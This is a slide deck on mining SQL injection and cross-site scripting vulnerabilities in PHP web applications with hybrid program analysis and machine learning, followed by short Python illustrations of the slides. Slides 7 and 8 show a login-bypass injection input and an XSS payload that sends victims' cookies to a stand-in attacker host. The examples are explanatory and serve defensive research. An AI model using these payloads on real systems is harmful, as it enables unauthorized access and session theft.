ATM: Black-box Test Case Minimization based on Test Code Similarity and Evolu...ATM: Black-box Test Case Minimization based on Test Code Similarity and Evolu...
ATM: Black-box Test Case Minimization based on Test Code Similarity and Evolu...Lionel Briand
 
Black-box Safety Analysis and Retraining of DNNs based on Feature Extraction ...
Black-box Safety Analysis and Retraining of DNNs based on Feature Extraction ...Black-box Safety Analysis and Retraining of DNNs based on Feature Extraction ...
Black-box Safety Analysis and Retraining of DNNs based on Feature Extraction ...Lionel Briand
 
PRINS: Scalable Model Inference for Component-based System Logs
PRINS: Scalable Model Inference for Component-based System LogsPRINS: Scalable Model Inference for Component-based System Logs
PRINS: Scalable Model Inference for Component-based System LogsLionel Briand
 
Revisiting the Notion of Diversity in Software Testing
Revisiting the Notion of Diversity in Software TestingRevisiting the Notion of Diversity in Software Testing
Revisiting the Notion of Diversity in Software TestingLionel Briand
 
Applications of Search-based Software Testing to Trustworthy Artificial Intel...
Applications of Search-based Software Testing to Trustworthy Artificial Intel...Applications of Search-based Software Testing to Trustworthy Artificial Intel...
Applications of Search-based Software Testing to Trustworthy Artificial Intel...Lionel Briand
 
Autonomous Systems: How to Address the Dilemma between Autonomy and Safety
Autonomous Systems: How to Address the Dilemma between Autonomy and SafetyAutonomous Systems: How to Address the Dilemma between Autonomy and Safety


Mining SQLi and XSS Vulnerabilities Using Hybrid Analysis

  • 1. Mining SQL Injection and Cross Site Scripting Vulnerabilities using Hybrid Program Analysis
      Shar Lwin Khin, Tan Hee Beng Kuan: Information Engineering, Nanyang Technological University, Singapore
      Lionel Briand: Interdisciplinary Centre for ICT Security, Reliability, and Trust, University of Luxembourg, Luxembourg
      shar0035@e.ntu.edu.sg, ibktan@e.ntu.edu.sg, lionel.briand@uni.lu
  • 2. Motivation
      • Increasing number of vulnerabilities
      • Developers lack security awareness
      • Manual vulnerability audit is effort intensive
  • 3. Related Work
      Method                       Granularity   Accuracy   Scalability
      Vuln. prediction             ×             √          √
      Static taint analysis        √             ×          √
      Static & dynamic analysis    √             √          ×
      ???                          √             √          √
  • 4. Problem Definition 1/2
      • Input validation and sanitization are two common defense methods used in web applications
      • Static attributes have been shown to be indicators of vulnerabilities, though not accurate enough
      • Can static and dynamic attributes that characterize the implementations of these defense methods be used together as indicators?
      • Machine learning to predict vulnerability based on attributes
  • 5. Problem Definition 2/2
      • Typical prediction models are classification-based
      • Being supervised learning, their effectiveness depends on the availability of sufficient training data tagged with class labels
      • Cluster analysis (CA) is a type of unsupervised learning method
      • CA may be used if vulnerable instances can be distinguished from non-vulnerable instances based on the proposed attributes
  • 6. Vulnerability Distributions
      [Figure: vulnerability distributions. © Web Hacking Incident Database]
  • 7. SQL Injection
      • Cause: Inadequate validation and sanitization of user inputs used in queries
      • Diagram: Hacker → login.php → Database
      • Query built in login.php: $q = "select * from user where name='".$name."' and pw='".$pw."'"
      • Attack input: $name = ' or 1=1 --
      • Resulting query: select * from user where name='' or 1=1--' and pw=''
      • Result: unauthorized user information (SQLI!)
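The concatenation problem on this slide can be reproduced in a few lines. The following is a minimal sketch in Python with an in-memory SQLite database, not the PHP/MySQL setup of the slide; the table name `users`, the sample row, and the helper `build_query_unsafe` are assumptions made for illustration.

```python
import sqlite3

def build_query_unsafe(name, pw):
    # Hypothetical helper: mirrors the slide's string concatenation.
    return "select * from users where name='" + name + "' and pw='" + pw + "'"

conn = sqlite3.connect(":memory:")
conn.execute("create table users (name text, pw text)")
conn.execute("insert into users values ('alice', 'secret')")

attack = "' or 1=1 --"

# Concatenation: the input closes the string literal, adds "or 1=1",
# and comments out the password check.
unsafe_rows = conn.execute(build_query_unsafe(attack, "")).fetchall()

# Parameter binding: the same input is treated as a plain value.
safe_rows = conn.execute(
    "select * from users where name=? and pw=?", (attack, "")
).fetchall()

print(len(unsafe_rows), len(safe_rows))
```

With concatenation the attack input returns the stored row; with bound parameters it matches nothing.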
  • 8. Cross Site Scripting
      • Cause: No sanity check of input before it is used in HTML documents
      • Diagram: Hacker → travelerTip.php → Victim
      • Inject script: <script>alert(xss!);</script>
      • Visit: http://travelingForum/travelerTip.php?Action=Post&Place=Greece&Tip=<Script>document.location='http://hackerSite/stealCookie.jsp?cookie='+document.cookie;</Script>
      • Injected script executed on victim's browser (XSS!)
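The missing check described on this slide corresponds to output escaping. A minimal Python sketch, assuming hypothetical `render_tip_unsafe` and `render_tip_escaped` helpers standing in for the page that echoes the `Tip` parameter:

```python
import html

def render_tip_unsafe(tip):
    # Hypothetical page fragment: input is placed into HTML unchanged.
    return "<p>" + tip + "</p>"

def render_tip_escaped(tip):
    # html.escape turns <, >, &, and quotes into character references,
    # so the browser shows the text instead of running it.
    return "<p>" + html.escape(tip) + "</p>"

payload = "<script>alert('xss!');</script>"
unsafe_page = render_tip_unsafe(payload)
escaped_page = render_tip_escaped(payload)
print(escaped_page)
```

Only the escaped version keeps the payload from being parsed as a script element.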
  • 9. Vulnerability Prediction Principles 1/2
      • Using hybrid code attributes to predict vulnerabilities
      • Based on both static and dynamic program analyses
      • Input validation checks and sanitization operations are mainly based on string operations, e.g., preg_replace("<script", "", $data)
      • Classify the types of string operations applied according to their potential effects on the inputs before their use in security-sensitive statements (sinks), e.g., echo $data; mysql_query($data)
      • Such validation checks and operations can be identified by analyzing data dependence graphs
  • 10. Vulnerability Prediction Principles 2/2
      • Given the data dependence graph of a sink: by extracting the number of inputs, and the numbers and types of validation and sanitization functions from the graph, can we predict the sink's vulnerability?
      • E.g., if a sink uses five different inputs, there should be at least five input validation or sanitization functions.
      [Figure: data dependence graph of a sink]
  • 11. Static and Dynamic Classification
      • A node is classified statically based on the built-in language functions with specific security purposes, the language operators, and the predefined language parameters it uses, e.g., addslashes($input), $_GET, $a = $b . $c
      • A node is classified dynamically if it invokes user-defined functions or certain built-in functions such as string replacement, e.g., $sanitized = preg_replace("<+", "", $input)
      • In the dynamic case, the function code is executed using a set of predefined test inputs, and the final values of the test input variables are searched for malicious characters.
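The dynamic step on this slide (run the function on test inputs, then search the results for malicious characters) can be sketched as follows. This is an illustrative Python analogue, not the tool's implementation; the test inputs, the `strip_angle_brackets` function, and the `removes` helper are all assumptions.

```python
import re

# Hypothetical predefined test inputs containing characters of interest.
TEST_INPUTS = ["<script>alert(1)</script>", "' or 1=1 --", "<<b>>"]

def strip_angle_brackets(value):
    # Python analogue of the slide's preg_replace("<+", "", $input).
    return re.sub(r"<+", "", value)

def removes(sanitizer, chars, inputs=TEST_INPUTS):
    # True if none of the given characters survive in any sanitized output.
    return all(
        not any(c in sanitizer(x) for c in chars)
        for x in inputs
    )

print(removes(strip_angle_brackets, "<"))   # opening brackets are removed
print(removes(strip_angle_brackets, "<>"))  # closing brackets survive
print(removes(strip_angle_brackets, "'"))   # quotes survive
```

A function that passes the check for a given character set could then be counted under the matching dynamic attribute (for example HTML-tag or delimiter filtering).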
  • 12. Hybrid Code Attributes
      ID  Attribute Name      Description
      Static attributes
      1   Client              The number of nodes that access data from HTTP request parameters
      2   File                The number of nodes that access data from files
      3   Database            The number of nodes that access data from database
      4   Text-database       Boolean value 'TRUE' if there is any text-based data accessed from database; 'FALSE' otherwise
      5   Other-database      Boolean value 'TRUE' if there is any data except text-based data accessed from database; 'FALSE' otherwise
      6   Session             The number of nodes that access data from persistent data objects
      7   Uninit              The number of nodes that reference un-initialized program variable
      8   SQLI-sanitization   The number of nodes that apply standard sanitization functions for preventing SQLI issues
      9   XSS-sanitization    The number of nodes that apply standard sanitization functions for preventing XSS issues
      10  Numeric-casting     The number of nodes that type-cast data into a numeric type data
      11  Numeric-type-check  The number of nodes that perform numeric data type check
      12  Encoding            The number of nodes that encode data into a certain format
      13  Un-taint            The number of nodes that return predefined information or information not influenced by external users
      14  Boolean             The number of nodes which invoke functions that return Boolean value
      15  Propagate           The number of nodes that propagate partial or complete value of an input
      Dynamic attributes
      16  Numeric             The number of nodes which invoke functions that return only numeric, mathematic, or dash characters
      17  LimitLength         The number of nodes that invoke string-length limiting functions
      18  URL                 The number of nodes that invoke path-filtering functions
      19  EventHandler        The number of nodes that invoke event-handler filtering functions
      20  HTMLTag             The number of nodes that invoke HTML-tag filtering functions
      21  Delimiter           The number of nodes that invoke delimiter filtering functions
      22  AlternateEncode     The number of nodes that invoke alternate-character-encoding filtering functions
      Target attribute
      23  Vulnerable?         Indicates a class label: Vulnerable or Not-Vulnerable
  • 13. Sample Attribute Vectors
      • Each sink would be represented by a 23-dimensional attribute vector.
      • Sample attribute vectors (Session, XSS-sanit, Un-taint, Delimiter, Propagate, …, Vulnerable?):
          (2, 4, 0, 0, 2, …, Not-Vulnerable)
          (1, 0, 1, 1, 7, …, Vulnerable)
  • 14. Supervised Vulnerability Prediction
      • Data preprocessing
          • Normalization
          • Principal Component Analysis
      • Classifiers
          • Logistic Regression (regression analysis)
          • Multi-Layer Perceptron (neural network analysis)
      • Training & testing: 10-fold cross validation
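The slides do not say which normalization is applied before PCA. As one common possibility, the sketch below applies min-max scaling per attribute to the five visible values of the two sample vectors from the previous slide; the function name `min_max_normalize` and the choice of min-max scaling are assumptions.

```python
def min_max_normalize(vectors):
    # Scale each attribute (column) to [0, 1]; a constant column maps to 0.0.
    columns = list(zip(*vectors))
    lows = [min(col) for col in columns]
    highs = [max(col) for col in columns]
    return [
        [(v - lo) / (hi - lo) if hi > lo else 0.0
         for v, lo, hi in zip(row, lows, highs)]
        for row in vectors
    ]

# Session, XSS-sanit, Un-taint, Delimiter, Propagate (class label omitted).
samples = [
    [2, 4, 0, 0, 2],
    [1, 0, 1, 1, 7],
]
normalized = min_max_normalize(samples)
print(normalized)
```

Scaling of this kind keeps attributes with large counts, such as Propagate, from dominating distance-based or variance-based steps that follow.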
  • 15. Unsupervised Vulnerability Prediction
      • Use the same data preprocessing activities as the supervised models
      • K-means cluster analysis based on two assumptions:
          • non-vulnerable sinks are much more frequent than vulnerable sinks
          • vulnerable sinks have different characteristics from non-vulnerable sinks
      • Label clusters as Vulnerable or Non-Vulnerable:
          • K=4: Maximum number of clusters
          • %Normal=12: Minimum size of non-vulnerable cluster
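One reading of the labeling step on this slide is that a cluster holding at least %Normal percent of all sinks is labeled Non-Vulnerable and any smaller cluster is labeled Vulnerable. The sketch below implements only that rule on cluster assignments that are assumed to come from a prior k-means run; the function name and the example sizes are hypothetical, and the exact rule used by the authors may differ.

```python
from collections import Counter

def label_clusters(assignments, pct_normal=12.0):
    # assignments: one cluster id per sink, e.g. the output of k-means.
    # A cluster is labeled Non-Vulnerable when it contains at least
    # pct_normal percent of all sinks, Vulnerable otherwise.
    sizes = Counter(assignments)
    total = len(assignments)
    return {
        cluster_id: (
            "Non-Vulnerable"
            if 100.0 * size / total >= pct_normal
            else "Vulnerable"
        )
        for cluster_id, size in sizes.items()
    }

# Hypothetical assignment of 100 sinks to three clusters.
assignments = [0] * 90 + [1] * 8 + [2] * 2
labels = label_clusters(assignments)
print(labels)
```

Under this rule the labeling depends on vulnerable sinks being rare: when they make up a large share of the data, they form large clusters and are labeled Non-Vulnerable.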
  • 16. Case Study
      • Six open source web applications (PHP):
          • Known vulnerable
          • Functionalities: school admin, forum, news, content, database management
          • Sizes: from 2k to 44k LOC
      • Vulnerability identification: manual and vulnerability databases (Bugtraq, CVE)
  • 17. Prototype Tool
      [Figure: Architecture of PhpMiner; the diagram includes Weka]
  • 18. Experiment & Result 1/2
      Classification results of predictors built from hybrid attributes (measures in %):
      Data               Classifier   recall   false alarm   precision
      schmate-html       LR           99       3             98
                         MLP          99       0             100
      faqforge-html      LR           89       5             94
                         MLP          91       5             94
      utopia-html        LR           94       1             94
                         MLP          94       2             89
      phorum-html        LR           78       1             70
                         MLP          33       0             100
      cutesite-html      LR           68       9             61
                         MLP          78       8             67
      myadmin-html       LR           85       1             89
                         MLP          75       1             83
      Average (XSS)      LR           86       3             84
                         MLP          78       3             89
      schmate-sql        LR           97       8             98
                         MLP          96       35            92
      faqforge-sql       LR           88       4             94
                         MLP          88       4             94
      phorum-sql         LR           100      3             63
                         MLP          0        1             0
      cutesite-sql       LR           91       14            89
                         MLP          89       18            86
      Average (SQLI)     LR           94       7             86
                         MLP          68       15            68
      Overall average    LR           90       5             85
                         MLP          74       8             81
      • LR performs better than MLP
      • Maximum analysis time: 2 hours, average ½ hour
      • Accuracy:
          • Shin et al. TSE'11 [3] achieved recall>80 and pf<25
          • Pixy S&P'06 [1] reported pf>20. Too many false positives!
          • Ardilla ICSE'09 [4] reported up to 50% of paths left unexplored. False negatives?
          • Our result: recall=90, pf=5
  • 19. Experiment & Result 2/2
      k-means clustering analysis results on the datasets which have < 40% vulnerable sinks (measures in %):
      Data             recall   false alarm   precision
      utopia-html      100      13            65
      phorum-html      56       11            16
      cutesite-html    70       20            41
      myadmin-html     55       8             33
      phorum-sql       100      7             38
      Average          76       12            39
      k-means clustering analysis results on the datasets which have ≥ 40% vulnerable sinks (measures in %):
      Data             recall   false alarm   precision
      schmate-html     9        0             100
      faqforge-html    26       0             100
      schmate-sql      3        32            29
      faqforge-sql     0        0             undefined
      cutesite-sql     0        0             undefined
      Average          8        6             undefined
      • When assumptions are not met, clustering does not work!
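The three measures in the result tables follow the standard confusion-matrix definitions: recall = TP/(TP+FN), false alarm (pf) = FP/(FP+TN), and precision = TP/(TP+FP). The sketch below is a minimal Python illustration with made-up counts; it returns None where a denominator is zero, which is the situation reported as "undefined" when no sink is predicted vulnerable.

```python
def ratio(numerator, denominator):
    # None stands for "undefined" when the denominator is zero.
    return numerator / denominator if denominator else None

def measures(tp, fp, tn, fn):
    return {
        "recall": ratio(tp, tp + fn),       # vulnerable sinks found
        "false_alarm": ratio(fp, fp + tn),  # safe sinks wrongly flagged
        "precision": ratio(tp, tp + fp),    # flagged sinks that are vulnerable
    }

# Hypothetical counts, not taken from the study.
example = measures(tp=9, fp=1, tn=19, fn=1)
nothing_flagged = measures(tp=0, fp=0, tn=20, fn=10)
print(example)
print(nothing_flagged)
```

In the second call no sink is flagged, so recall and false alarm are both 0 while precision has no defined value.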
  • 20. Limitations
      • Supervised learning requires sufficient labeled data for training
      • Unsupervised learning relies on assumptions that are not always true. Is it applicable to most commercial systems?
      • Unsupervised learning requires tuning the parameters:
          • K: Maximum number of clusters
          • %Normal: Minimum size of non-vulnerable cluster
  • 21. Conclusion
      • Supports security auditing by providing probabilistic alerts about vulnerable code statements
      • Proposes hybrid (static and dynamic) code attributes for vulnerability prediction using machine learning
      • Attributes characterize common input validation and sanitization code patterns, without expensive analysis
          • Scalability: < 2 hours on a regular PC
      • Both supervised and unsupervised learning methods were used
          • Supervised learning accuracy: 90% recall, 85% precision
          • Unsupervised learning: lower accuracy, applicability?
  • 22. Future Work
      • Semi-supervised learning
      • Combining data dependency information with control dependency information
      • Address other types of similar vulnerabilities by considering other types of code patterns
  • 23. The End!
      http://sharlwinkhin.com
      Thank you! Questions?
  • 24. References
      1. N. Jovanovic, C. Kruegel, and E. Kirda, "Pixy: a static analysis tool for detecting web application vulnerabilities," in IEEE Symposium on Security and Privacy, 2006, pp. 258-263.
      2. D. Balzarotti et al., "Saner: composing static and dynamic analysis to validate sanitization in web applications," in IEEE Symposium on Security and Privacy, 2008, pp. 387-401.
      3. Y. Shin, A. Meneely, L. Williams, and J. A. Osborne, "Evaluating complexity, code churn, and developer activity metrics as indicators of software vulnerabilities," IEEE Transactions on Software Engineering, vol. 37 (6), pp. 772-787, 2011.
      4. A. Kieżun, P. J. Guo, K. Jayaraman, and M. D. Ernst, "Automatic creation of SQL injection and cross-site scripting attacks," in Proceedings of the 31st International Conference on Software Engineering, Vancouver, BC, 2009, pp. 199-209.
      5. RSnake. http://ha.ckers.org, accessed March 2012.
      6. I. H. Witten and E. Frank, Data Mining, 2nd ed., Morgan Kaufmann, 2005.